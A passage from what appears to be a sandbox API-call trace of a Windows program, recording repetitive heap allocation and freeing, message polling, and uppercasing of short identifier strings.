(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.926] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0208.926] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0208.926] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a739c8 [0208.927] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.927] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0208.927] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0208.927] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739c8 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0208.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.929] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73bc0 [0208.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0208.929] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0208.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.930] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0208.930] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0208.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.930] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73bc0 | out: hHeap=0x2af0000) returned 1 [0208.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0208.930] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0208.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0208.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0208.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0208.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0208.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0208.932] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0208.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.932] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0208.933] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0208.933] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0208.933] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0208.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0208.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0208.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0208.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 